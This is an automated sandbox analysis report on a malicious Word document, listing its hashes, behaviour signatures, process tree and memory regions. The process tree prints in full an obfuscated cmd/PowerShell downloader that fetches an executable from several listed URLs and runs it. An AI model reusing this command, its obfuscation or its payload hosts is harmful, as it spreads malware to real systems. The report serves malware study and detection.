Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 00:28

General

  • Target

    621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc

  • Size

    134KB

  • MD5

    621b8cdd17688f2ed0eb8f985f9463a6

  • SHA1

    d5fa8a2854e16f3b5663ec5adc1225a4408679c3

  • SHA256

    4b4fbf3de37b71b5a81da84da06a2264dfec57b849e6f4ac5cb55197a05c540b

  • SHA512

    cc1b8d6f1d5a8ab712ad46b002a02fd874a308a72e42223a23e20d926f27dcebc50c9bbdc95597f44c82d944824c42bfd29700dff4b436ebbea330020a534bee

  • SSDEEP

    1536:9JL8ec0qe4PkTf560/hc+ah1CjN6lE/OH7841Pee2L6Dq+5A9lC6wtRDC0a7rqnn:ie4M160/hgkjOkL6DLwwtFC0pqLHLg

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\621b8cdd17688f2ed0eb8f985f9463a6JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2788
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd qCacJpzK aXMjOrbjcLdtjClIlIY wFwDvIQNpS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %vLdlwtPRzUGwzzj%=fUfNRXCBzctC&&set %JlqCGdNLf%=p&&set %UvQizJMohMOXdK%=o^w&&set %ubzaElQcSmwFsYF%=NsolmmsV&&set %aMBrVvWvLfXK%=!%JlqCGdNLf%!&&set %kmbXIblVzNXVVju%=jETtWZVt&&set %mrMwFIRnwwmYmb%=e^r&&set %rGnKwKir%=!%UvQizJMohMOXdK%!&&set %VtbGPkGTBqN%=s&&set %RvoHoIQIiipRKsT%=AdFfBjljzcFhS&&set %ddwmIjG%=he&&set %mAMaqDHTiM%=ll&&!%aMBrVvWvLfXK%!!%rGnKwKir%!!%mrMwFIRnwwmYmb%!!%VtbGPkGTBqN%!!%ddwmIjG%!!%mAMaqDHTiM%! "('EmVnsada'+'s'+'d = &(QbvnQb'+'v'+'+QbveQbv+'+'Qbvw-'+'objec'+'Qbv+QbvtQ'+'bv'+') ra'+'ndom'+';Em'+'VYYU = .(Qbvne'+'Qbv+Q'+'b'+'vwQbv+Q'+'bv-objec'+'tQbv) S'+'ystem.N'+'et.'+'WebClient;E'+'mVNSB = EmVnsadasd'+'.next'+'(100'+'00,'+' 2821'+'33);Em'+'V'+'ADCX ='+' Qbv'+' http:'+'//'+'thurtell.com/R5FTbS'+'/@http:/'+'/'+'hireatr'+'adesman.co'+'m'+'.au/UkA'+'7'+'V'+'/'+'@http:'+'/'+'/'+'tigge'+'rne'+'ss.net/NN'+'3U'+'bF/@http://lunarianar'+'t.com/'+'b'+'k'+'li'+'/@'+'http://aly'+'n'+'fi'+'res'+'.co.uk/8'+'ckoG'+'S'+'/'+'Qbv.'+'Spli'+'t(Qbv@Qbv);EmVSDC'+' = '+'EmVenv:pu'+'bl'+'ic + QbvM'+'GeQ'+'b'+'v + Em'+'VNS'+'B'+' + (Q'+'bv'+'.'+'e'+'xQbv+Qbve'+'Qbv)'+';f'+'ore'+'ach('+'EmVas'+'fc'+' i'+'n Em'+'VADCX){'+'try'+'{'+'E'+'mVY'+'YU.u7qDo'+'SAuW'+'nlSAuOadFI'+'SAuleu7q(E'+'mVasf'+'c.u7qToStrSAuiSAuNgu7q(),'+' Em'+'VSDC);&(QbvI'+'nvoQbv+'+'Q'+'bv'+'kQbv+Qbve-It'+'emQb'+'v)(Em'+'VSDC)'+';'+'bre'+'ak;}c'+'atch{}}').RePLAce('Qbv',[STRING][Char]39).RePLAce('u7q',[STRING][Char]34).RePLAce('SAu','`').RePLAce('MGe','\').RePLAce('EmV',[STRING][Char]36) |. ((vARiabLe '*mDr*').NaMe[3,11,2]-jOIN'')
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "('EmVnsada'+'s'+'d = &(QbvnQb'+'v'+'+QbveQbv+'+'Qbvw-'+'objec'+'Qbv+QbvtQ'+'bv'+') ra'+'ndom'+';Em'+'VYYU = .(Qbvne'+'Qbv+Q'+'b'+'vwQbv+Q'+'bv-objec'+'tQbv) S'+'ystem.N'+'et.'+'WebClient;E'+'mVNSB = EmVnsadasd'+'.next'+'(100'+'00,'+' 2821'+'33);Em'+'V'+'ADCX ='+' Qbv'+' http:'+'//'+'thurtell.com/R5FTbS'+'/@http:/'+'/'+'hireatr'+'adesman.co'+'m'+'.au/UkA'+'7'+'V'+'/'+'@http:'+'/'+'/'+'tigge'+'rne'+'ss.net/NN'+'3U'+'bF/@http://lunarianar'+'t.com/'+'b'+'k'+'li'+'/@'+'http://aly'+'n'+'fi'+'res'+'.co.uk/8'+'ckoG'+'S'+'/'+'Qbv.'+'Spli'+'t(Qbv@Qbv);EmVSDC'+' = '+'EmVenv:pu'+'bl'+'ic + QbvM'+'GeQ'+'b'+'v + Em'+'VNS'+'B'+' + (Q'+'bv'+'.'+'e'+'xQbv+Qbve'+'Qbv)'+';f'+'ore'+'ach('+'EmVas'+'fc'+' i'+'n Em'+'VADCX){'+'try'+'{'+'E'+'mVY'+'YU.u7qDo'+'SAuW'+'nlSAuOadFI'+'SAuleu7q(E'+'mVasf'+'c.u7qToStrSAuiSAuNgu7q(),'+' Em'+'VSDC);&(QbvI'+'nvoQbv+'+'Q'+'bv'+'kQbv+Qbve-It'+'emQb'+'v)(Em'+'VSDC)'+';'+'bre'+'ak;}c'+'atch{}}').RePLAce('Qbv',[STRING][Char]39).RePLAce('u7q',[STRING][Char]34).RePLAce('SAu','`').RePLAce('MGe','\').RePLAce('EmV',[STRING][Char]36) |. ((vARiabLe '*mDr*').NaMe[3,11,2]-jOIN'')
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2512

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      6596c9e6a2e67657b069d603eb4ce480

      SHA1

      084d4ac3553aecbb86cce1c11250e3c163176c3c

      SHA256

      02a6da8708d56c1e9f33008336746655c6669a896ae0ce4f58227ae72a74aa04

      SHA512

      599b30999278c191ca3841d8f19fa343069220543a6183f33bd06b3f4a2dedf84ffd3ddab8e185034a19abed85528b348e25563de1e05ac6f78c9e3ac996e256

    • memory/3044-21-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-43-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-22-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-0-0x000000002F311000-0x000000002F312000-memory.dmp
      Filesize

      4KB

    • memory/3044-8-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-6-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-7-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-46-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-40-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-49-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-39-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-38-0x0000000006800000-0x0000000006900000-memory.dmp
      Filesize

      1024KB

    • memory/3044-37-0x0000000006800000-0x0000000006900000-memory.dmp
      Filesize

      1024KB

    • memory/3044-30-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-24-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-23-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-9-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-20-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-2-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize

      44KB

    • memory/3044-19-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-18-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-48-0x0000000006800000-0x0000000006900000-memory.dmp
      Filesize

      1024KB

    • memory/3044-17-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-16-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-15-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-14-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-13-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-12-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-11-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-10-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-59-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize

      44KB

    • memory/3044-60-0x0000000000460000-0x0000000000560000-memory.dmp
      Filesize

      1024KB

    • memory/3044-61-0x0000000006800000-0x0000000006900000-memory.dmp
      Filesize

      1024KB

    • memory/3044-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/3044-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/3044-79-0x00000000717FD000-0x0000000071808000-memory.dmp
      Filesize

      44KB